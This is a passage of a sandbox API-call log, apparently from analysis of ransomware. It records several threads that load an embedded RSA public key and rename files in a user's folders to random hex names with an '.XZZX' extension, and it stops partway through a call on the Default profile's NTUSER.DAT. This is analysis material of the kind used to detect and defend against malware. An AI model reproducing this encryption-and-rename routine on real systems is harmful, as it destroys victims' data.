Data3=0x403f, Data4=([0]=0x88, [1]=0xa1, [2]=0x3d, [3]=0xfa, [4]=0x26, [5]=0xb4, [6]=0x12, [7]=0x72))) returned 0x0 [0256.347] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\37E85546159C2E64B110DA791A0612AC.XZZX") returned 85 [0256.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.347] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\21E8F7001B950C185FEB58601E4FF060.XZZX") returned 85 [0256.347] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1052 os_tid = 0x1380 [0256.501] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.502] lstrcpyW (in: lpString1=0x2baf460, lpString2="8181DC6820279A95628FB268245D7EDD.XZZX" | out: lpString1="8181DC6820279A95628FB268245D7EDD.XZZX") returned="8181DC6820279A95628FB268245D7EDD.XZZX" [0256.502] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.502] SetErrorMode (uMode=0x1) returned 0x1 [0256.502] lstrcpyW (in: lpString1=0x2baf860, lpString2="8181DC6820279A95628FB268245D7EDD.XZZX" | out: lpString1="8181DC6820279A95628FB268245D7EDD.XZZX") returned="8181DC6820279A95628FB268245D7EDD.XZZX" [0256.502] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8da5808a, Data2=0xda2f, Data3=0x4c62, Data4=([0]=0xb4, [1]=0x37, [2]=0x13, [3]=0xa9, [4]=0xfb, [5]=0x21, [6]=0xe6, [7]=0x6d))) returned 0x0 [0256.502] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8181DC6820279A95628FB268245D7EDD.XZZX") returned 85 [0256.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.502] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\F0D81D56411979FE8DA5808A43D45E46.XZZX") returned 85 [0256.502] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1053 os_tid = 0x1384 [0256.657] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.657] lstrcpyW (in: lpString1=0x2baf460, lpString2="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" | out: lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" [0256.657] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.657] SetErrorMode (uMode=0x1) returned 0x1 [0256.657] lstrcpyW (in: lpString1=0x2baf860, lpString2="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" | out: lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" [0256.657] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x8911158a, Data2=0x5db6, Data3=0x457f, Data4=([0]=0xb7, [1]=0x63, [2]=0x9a, [3]=0xac, [4]=0xb7, [5]=0xee, [6]=0xf, [7]=0xae))) returned 0x0 [0256.657] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned 85 [0256.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.657] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\A6F8721C19708B4A8911158A1C2B6F92.XZZX") returned 85 [0256.658] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1054 os_tid = 0x1388 [0256.813] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.813] lstrcpyW (in: lpString1=0x2baf460, lpString2="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" | out: lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" [0256.813] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.813] SetErrorMode (uMode=0x1) returned 0x1 [0256.813] lstrcpyW (in: lpString1=0x2baf860, lpString2="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" | out: lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" [0256.813] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xd115d6b9, Data2=0x6619, Data3=0x4e70, Data4=([0]=0xa1, [1]=0x20, [2]=0xcc, [3]=0x8, [4]=0xb1, [5]=0x56, [6]=0xf0, [7]=0x5))) returned 0x0 [0256.814] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned 85 [0256.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.814] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\1EAFAE111F4848F0D115D6B922032D38.XZZX") returned 85 [0256.814] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1055 os_tid = 0x138c [0256.971] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.971] lstrcpyW (in: lpString1=0x2baf460, lpString2="04BF022041D4F9A43C1202C84609DDEC.XZZX" | out: lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX") returned="04BF022041D4F9A43C1202C84609DDEC.XZZX" [0256.971] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0256.971] SetErrorMode (uMode=0x1) returned 0x1 [0256.971] lstrcpyW (in: lpString1=0x2baf860, lpString2="04BF022041D4F9A43C1202C84609DDEC.XZZX" | out: lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX") returned="04BF022041D4F9A43C1202C84609DDEC.XZZX" [0256.971] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x4082ca55, Data2=0x4746, Data3=0x4319, Data4=([0]=0xa2, [1]=0x28, [2]=0xb1, [3]=0x4f, [4]=0xa7, [5]=0x27, [6]=0x95, [7]=0xfd))) returned 0x0 [0256.971] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\04BF022041D4F9A43C1202C84609DDEC.XZZX") returned 96 [0256.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.971] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\E9E0E63E12AE47D64082CA5515692C1E.XZZX") returned 96 [0256.971] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1056 os_tid = 0x1390 [0257.125] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.125] lstrcpyW (in: lpString1=0x2baf460, lpString2="1CB22AF03A177B10110664B53E3C5F58.XZZX" | out: lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX") returned="1CB22AF03A177B10110664B53E3C5F58.XZZX" [0257.125] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0257.125] SetErrorMode (uMode=0x1) returned 0x1 [0257.125] lstrcpyW (in: lpString1=0x2baf860, lpString2="1CB22AF03A177B10110664B53E3C5F58.XZZX" | out: lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX") returned="1CB22AF03A177B10110664B53E3C5F58.XZZX" [0257.125] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xb8d1efba, Data2=0x64bf, Data3=0x4481, Data4=([0]=0xa8, [1]=0xd7, [2]=0x38, [3]=0x9e, [4]=0x4b, [5]=0xe7, [6]=0x28, [7]=0x99))) returned 0x0 [0257.125] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\1CB22AF03A177B10110664B53E3C5F58.XZZX") returned 96 [0257.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0257.125] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\E64683C61AF5803FB8D1EFBA1DB06487.XZZX") returned 96 [0257.125] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1057 os_tid = 0x1394 [0257.281] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.281] lstrcpyW (in: lpString1=0x2baf460, lpString2="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" | out: lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" [0257.281] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0257.281] SetErrorMode (uMode=0x1) returned 0x1 [0257.281] lstrcpyW (in: lpString1=0x2baf860, lpString2="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" | out: lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" [0257.281] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x11f92e5f, Data2=0xeb95, Data3=0x47bf, Data4=([0]=0x9d, [1]=0x88, [2]=0xc6, [3]=0x39, [4]=0xea, [5]=0x3f, [6]=0xb5, [7]=0x4b))) returned 0x0 [0257.281] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned 96 [0257.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0257.281] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\3399324B4206172B11F92E5F44C0FB73.XZZX") returned 96 [0257.282] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1058 os_tid = 0x1398 [0257.437] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.437] lstrcpyW (in: lpString1=0x2baf460, lpString2="E3086E520D4EE960428796111173CDA8.XZZX" | out: lpString1="E3086E520D4EE960428796111173CDA8.XZZX") returned="E3086E520D4EE960428796111173CDA8.XZZX" [0257.437] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0257.437] SetErrorMode (uMode=0x1) returned 0x1 [0257.437] lstrcpyW (in: lpString1=0x2baf860, lpString2="E3086E520D4EE960428796111173CDA8.XZZX" | out: lpString1="E3086E520D4EE960428796111173CDA8.XZZX") returned="E3086E520D4EE960428796111173CDA8.XZZX" [0257.437] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x6f085ac4, Data2=0x936e, Data3=0x484b, Data4=([0]=0xbf, [1]=0x7c, [2]=0x9f, [3]=0x88, [4]=0xbf, [5]=0x18, [6]=0xba, [7]=0xb))) returned 0x0 [0257.438] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\E3086E520D4EE960428796111173CDA8.XZZX") returned 96 [0257.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0257.438] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\81B58C3829A2213A6F085AC42C5D0582.XZZX") returned 96 [0257.438] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1059 os_tid = 0x139c [0257.596] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.596] lstrcpyW (in: lpString1=0x2baf460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0257.596] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0257.596] SetErrorMode (uMode=0x1) returned 0x1 [0257.596] lstrcpyW (in: lpString1=0x2baf860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0257.596] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9fbe2bc7, Data2=0x4699, Data3=0x4a50, Data4=([0]=0xbc, [1]=0xc0, [2]=0x3a, [3]=0xe6, [4]=0x6f, [5]=0x73, [6]=0xd0, [7]=0x99))) returned 0x0 [0257.596] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0257.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, 